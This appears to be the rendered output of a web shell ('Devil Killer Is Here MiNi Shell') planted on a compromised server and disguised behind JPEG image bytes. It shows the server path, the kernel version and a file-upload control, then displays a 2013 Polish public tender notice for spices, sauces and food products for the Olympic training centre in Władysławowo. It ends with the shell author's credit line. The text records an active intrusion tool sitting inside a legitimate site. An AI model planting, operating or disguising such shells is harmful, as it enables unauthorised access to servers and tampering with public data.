JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131003/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131003/401940-N-2013.html

<p class="kh_header"><b>Władysławowo: Sukcesywne dostawy  przypraw, półproduktów i przetworów   wraz z usługą transportu</b><br>
<b>Numer ogłoszenia: 401940 - 2013; data zamieszczenia: 03.10.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Centralny Ośrodek Sportu w Warszawie, Ośrodek Przygotowań Olimpijskich im. Feliksa Stamma we Władysławowie , ul. Żeromskiego 52, 84-120 Władysławowo, woj. pomorskie, tel. 058 6746314, faks 058 6746350.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.cetniewo.cos.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Instytucja Gospodarki Budżetowej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywne dostawy  przypraw, półproduktów i przetworów   wraz z usługą transportu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są sukcesywne dostawy  przypraw, półproduktów i przetworów   wraz z usługą transportu do Ośrodka Przygotowań Olimpijskich we Władysławowie przez okres 6 miesięcy. Wartość szacunkowa zamówienia nie przekracza kwoty określonej w przepisach wydanych na podstawie art. 11 ust. 8 ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych  (Dz. U. z 2013 r. poz. 907) - tekst jednolity.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.87.00.00-7, 15.87.12.60-4, 15.89.10.00-0, 15.87.24.00-5, 15.87.20.00-1, 63.20.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 6.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Jeżeli z upływem 6 miesięcy od dnia podpisania niniejszej umowy kwota określona w ust. 1 zawartej umowy pozostanie nie zrealizowana, Strony mogą uzgodnić, w formie pisemnego aneksu, realizację niniejszej umowy do momentu osiągnięcia tej kwoty, nie dłużej jednak niż 4 lata od dnia podpisania umowy
2.	Strony zgodnie oświadczają, że ilość podana w formularzu cenowym (załącznik Nr 2 do Umowy) jest szacunkowa. Zamawiający zastrzega sobie prawo, w zależności od preferencji klientów Zamawiającego, do zmian: ilości (według zamówień częściowych). 
3.	W trakcie realizacji umowy może nastąpić zmiana produktu na równoważny (bez zmiany ceny jednostkowej ) w przypadku zaprzestania produkcji asortymentu wskazanego przez Wykonawcę w ofercie. Warunkiem dokonania zmiany jest przedstawienie przez Wykonawcę pisemnego oświadczenia (lub innego dokumentu) producenta o zaprzestaniu produkcji oraz zgoda Zamawiającego na przedstawiony przez Wykonawcę produkt równoważny
4.	W przypadku wprowadzenia przez producenta innej gramatury lub pojemności niż określona w ofercie Wykonawcy Zamawiający dopuszcza w czasie trwania umowy zmianę gramatury produktów konfekcjonowanych - po uzgodnieniu i akceptacji przez obie strony Umowy. Zapisy ust. 3 stosuje się odpowiednio.
5.	W przypadku zmiany gramatury lub pojemności produktów konfekcjonowanych ceny jednostkowe będą przeliczone proporcjonalnie</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.cetniewo.cos.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Siedziba Zamawiającego ul. Żeromskiego 52, 84-120 Władysławowo.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.10.2013 godzina 10:00, miejsce: Siedziba Zamawiającego ul. Żeromskiego 52, 84-120 Władysławowo :SEKRETARIAT (budynek krytej pływalni).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Rosoły, zupy, sosy, dresingi, tłuszcze, dodatki do dań, desery.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia w części I są produkty na potrzeby działu gastronomii w zakresie: 1.	ROSÓŁ WOŁOWY kg	5.
2.	ROSÓŁ Z KURY (w paście) - 	kg	5.
3.	ROSÓŁ Z KURY (sypki) - 	kg	5.
4.	ROSÓŁ JARZYNOWY (sypki) -  kg	25.
5.	ROSÓŁ Z KURY (sypki) -	kg	39.
6.	BULION GRZYBOWY -  	kg	5.
7.	ZUPA KREM Z BOROWIKÓW - 	kg	5.
8.	ZUPA SZPARAGOWA -         	kg	5.
9.	BARSZCZ CZERWONY  -  kg	12.
10.	Rosół (fond) z owoców morza w paście  - 	kg	3.
11.	Sos podstawowy baza tak zwany Demi-Glace -kg	10.
12.	SOS PIECZENIOWY -( w paście), 	kg	10.
13.	SOS PIECZENIOWY (sypki) baza kg	10.
14.	Sos typu - CAFE de PARIS  - . z 1 kg, nie zawiera glutaminianu, sztucznych barwników i konserwantów .kg	5.
15.	Sos typu - ŚRÓDZIEMNOMORSKI  - kg	4.
16.	Sos typu - CYTRYNOWO-MAŚLANY -  	kg	6.
17.	SOS CHILI SŁODKO-PIKANTNY kg	16.
18.	Sos typu -SOS Z ZIELONYM PIEPRZEM kg	2.
19.	Baza do sosu typu - FIX DO POTRAW CHIŃKICH - kg	8.
20.	GRZANKI ZIOŁOWO-CZOSNKOWE- kg	14.
21.	GROSZEK PTYSIOWY- kg	14.
22.	Cebula smażona - kg	10.
23.	SOS SAŁATKOWY typu KOPERKOWY w proszku - kg	5.
24.	SOS SAŁATKOWY typu OGRODOWY - kg	5.
25.	SOS SAŁATKOWY, typu WŁOSKI kg	5.
26.	SOS SAŁATKOWY typu GRECKI - kg	5.
27.	Pulpa pomidorowa typu - TOMATO PRONTO kg	50.
28.	KONCENTRAT POMIDOROWY 30% kg	200.
29.	Pomidory bez skórki - kg	200.
30.	Pasta o aromatycznej kompozycji przypraw kg	3.
31.	Pasta o aromatycznej kompozycji przypraw połączonych z tłuszczem i solą typu - PRIMERBA  CZERWONE PESTO - kg	3.
32.	Pasta o aromatycznej kompozycji przypraw połączonych z tłuszczem i solą typu - PRIMERBA  GRZYBOWA -  skład kg	3.
33.	Pasta o aromatycznej kompozycji przypraw połączonych z tłuszczem i solą typu - PRIMERBA  PESTO -	kg	3.
34.	Pasta o aromatycznej kompozycji przypraw połączonych z tłuszczem i solą typu PRIMERBA  PROWANSALSKA 	kg	3.
35.	Zasmażka jasna - kg	4.
36.	Zasmażka ciemna - kg.	4.
37.	SOS SAŁATKOWY typu Czosnkowy - kg	5.
38.	Przyprawa w płynie typu ESENCJA Z WOŁOWINY LUB KURY, LUB WARZYWNA  	litr	2.
39.	Sos typu BARBECUE-	kg	6.
40.	Sos typu - HOLENDERSKI kg	19.
41.	Sos typu - CZTERY SERY z brokułami 	kg	2.
42.	Śmietana roślinna typu - Rama Cremefine Profi 31% -	litr	48.
43.	Śmietana roślinna typu - Rama Cremefine Profi 15% - litr	48.
44.	Śmietana roślinna typu - Rama Creme Fraiche do zup i sosów 24% - litr	48
45.	Jednoporcjowy tłuszcz do smarowania typu Rama - szt	2000
46.	Tłuszcz do piecy konwekcyjno-parowych typu -Rama litr	16
47.	Pieprz zielony w zalewie - 	litr	4
48.	Kapary w zalewie -	kg	7
49.	Zakwas do żurku - litr	180
50.	AUSZPIK - naturalny.	kg	30
51.	MUS CZEKOLADOWY(sypki) - kg	60.
52.	MUS JOGURTOWY(sypki)-	kg	30.
53.	POLEWY OWOCOWE DO LODÓW - 	kg	30.
54.	POLEWA CZEKOLADOWA DO LODÓW - kg	18.
55.	TIRAMISU (sypkie) - kg	40..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.87.12.60-4, 15.87.00.00-7, 15.89.10.00-0, 15.83.31.00-7, 15.89.32.00-6, 63.20.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Przyprawy jednolite i mieszane.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia w części II są produkty  na potrzeby działu gastronomii w zakresie: 1. 	Przyprawa typu - DELIKAT DO RYB kg	7.
2. 	Przyprawa typu - MARYNATA PREMIUM   kg	4.
3. 	Przyprawa typu - MARYNATA PREMIUM-do ryb i owoców morza; kg	4..
4. 	Przyprawa typu - MARYNATA PREMIUM - do wieprzowiny;  kg	6..
5. 	Przyprawa typu - MARYNATA PREMIUM-  do wołowiny; kg	5..
6. 	ZIOŁA PROWANSALSKIE -kg	3..
7. 	ROZMARYN - kg	2..
8. 	CZOSNEK GRANULOWANY-kg	4..
9. 	MAJERANEK SUSZONY- kg	6..
10. 	BAZYLIA - liscie bazylii wonnej,kg	3..
11. 	TYMIANEK kg	3..
12. 	KURKUMA - kg	3..
13. 	PAPRYKA SŁODKA, MIELONA -kg	8..
14. 	PIEPRZ BIAŁY, MIELONY - 	kg	6..
15. 	PIEPRZ CZARNY, MIELONY 	kg	22..
16. 	Przyprawa  typu - Pieprz Cytrynowy kg	6..
17. 	LIŚĆ LAUROWY opakowanie  kg	3.
18. 	PIEPRZ CZARNY, CAŁY -                                          	kg	3.
19. 	PIEPRZ KOLOROWY, CAŁY-kg	2.
20. 	PIEPRZ KOLOROWY MŁOTKOWANY - kg	3.
21. 	ZIELE ANGIELSKIE - kg	6.
22. 	SÓL WARZONA JODOWANA  kg	400.
23. 	Kwasek cytrynowy - kg	4..
24. 	Przyprawa typu - Delikt kg	75.
25. 	Cynamon mielony - kg	2.
26. 	Szafran - szt	2.
27. 	Oregano - kg	2.
28. 	Kminek - kg	2.
29. 	Gorczyca -  kg	2.
30. 	Curry - kg	2.
31. 	Przyprawa typu -	kg	4.
32. 	Przyprawa do flaków - sól, kg.	4.
33. 	Sól zmiękczająca mięso - kg	4.
34. 	WANILIA LASKA - 	szt	4.
35. 	CHILI - kg	3
36. 	Papryka mielona ostra - drobno kg	3.
37. 	Owoc jałowca - kg	2.
38. 	Gruboziarnista posypka do mięs - kg	1.
39. 	Gałka muszkatałowa - kg	1.
40. 	Kmin Rzymski - kg	1.
41. 	Goździki - kg	1.
42. 	Przyprawa typu - Delikat przyprawa do grilla -kg	8.
43. 	Przyprawa w płynie typu - Delikat przyprawa w płynie - kg	70.
44. 	Placki Ziemniaczane w proszku -	kg	20.
..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.87.00.00-7, 15.87.12.60-4, 15.89.10.00-0, 15.87.20.00-1, 63.20.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Przyprawy i dodatki różne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia w części III są produkty  na potrzeby działu gastronomii w zakresie:  1. 	Liście SUSHI NORI GOLD - do sushi pakowane po 50 listków szt.	4.
2. 	Sezam Czarny - 	kg	1.
3. 	Sezam biały - 	kg	1.
4. 	Nitki chili - kg	0,5.
5. 	Ocet ryżowy - litr	2
6. 	Pasta WASABI - kg	1.
7. 	Sos sojowy typu kikkoman - litr	5.
8. 	Sos sojowy ciemny - do zup, marynat i sosów. litr	2.
9. 	Sos rybny Oyster Brand - litr	2.
10. 	Trawa cytrynowa suszona kg	2.
11. 	Imbir marynowany różowy lub biały do sushi -kg	3.
12. 	Sos Mango -	kg	3.
13. 	Sos Worcestershire - 	litr	2.
14. 	Mleczko kokosowe - 	litr	12.
15. 	Pasta Curry czerwona, żółta, zielona - kg	4.
16. 	Pasta Tom yum -kg	4.
17. 	Pasta Tamaryndowa - kg	1,5..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.87.00.00-7, 15.87.12.60-4, 15.87.20.00-1, 63.20.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com